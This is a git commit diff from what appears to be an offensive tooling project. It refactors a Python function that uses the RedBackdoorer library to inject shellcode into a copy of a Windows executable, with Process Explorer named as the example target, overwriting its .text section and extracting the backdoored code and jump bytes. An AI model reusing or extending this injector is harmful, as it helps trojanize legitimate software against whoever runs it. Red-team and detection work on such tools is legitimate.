refactor: get code from exe after backdooring

2026-06-03 01:27:11 +00:00 · 2024-02-18 12:20:03 +00:00
parent ef65b92b9a
commit 3969f3d882
4 changed files with 105 additions and 60 deletions
@@ -3,9 +3,13 @@ import shutil
 import pprint
 import logging
 import time
+import tempfile

 from pehelper import *
 from model import *
+from observer import observer
+
+from redbackdoorer import PeBackdoor, Logger, options

 logger = logging.getLogger("Injector")

@@ -14,23 +18,64 @@ def inject_exe(
    shellcode_in: FilePath,
    exe_in: FilePath,
    exe_out: FilePath,
+    inject_mode: int,
 ):
-    logger.info("--[ Injecting: {} into: {} -> {} ".format(
-        shellcode_in, exe_in, exe_out
+    logger.info("--[ Injecting: {} into: {} -> {} mode {}".format(
+        shellcode_in, exe_in, exe_out, inject_mode
    ))

+    shellcode_len = len(file_readall_binary(shellcode_in))
+
    # create copy of file exe_in to exe_out
    shutil.copyfile(exe_in, exe_out)

-    # inject shellcode into exe_out with redbackdoorer
-    # python3.exe .\redbackdoorer.py 1,1 main-clean-append.bin .\exes\procexp64-a.exe
-    run_process_checkret([
-        "python3.exe",
-        "redbackdoorer.py",
-        project.inject_mode,
-        shellcode_in,
-        exe_out
-    ])
+    if False:
+        # python3.exe .\redbackdoorer.py 1,1 main-clean-append.bin .\exes\procexp64-a.exe
+        run_process_checkret([
+            "python3.exe",
+            "redbackdoorer.py",
+            project.inject_mode,
+            shellcode_in,
+            exe_out
+        ])
+    
+    options["verbose"] = True
+
+    # copy it first...
+    temp = tempfile.NamedTemporaryFile(delete=False)
+    shutil.copy(exe_out, temp.name)
+    outfile = temp.name
+
+    peinj = PeBackdoor(options, Logger)
+    result = peinj.backdoor(
+        1, # always overwrite .text section
+        inject_mode, 
+        shellcode_in, 
+        exe_out, 
+        outfile
+    )
+    if not result:
+        logging.error("Error: Redbackdoorer failed")
+        raise Exception("Redbackdoorer failed")
+
+    # and copy back
+    shutil.copy(outfile, exe_out)
+    temp.close()
+    os.unlink(temp.name)
+
+    print("Result: {}  and 0x{:x}  0x{:x}".format(
+        result, peinj.shellcodeOffset, peinj.backdoorOffsetRel,
+    ))
+
+    code = extract_code_from_exe(exe_out)
+
+    fucking_offset = peinj.backdoorOffsetRel
+
+    in_code = code[peinj.shellcodeOffsetRel:peinj.shellcodeOffsetRel+shellcode_len]
+    jmp_code = code[fucking_offset:fucking_offset+12]
+
+    observer.add_code("backdoored_code", in_code)
+    observer.add_code("backdoored_jmp", jmp_code)


 def injected_fix_iat(exe_out: FilePath, exe_info: ExeInfo):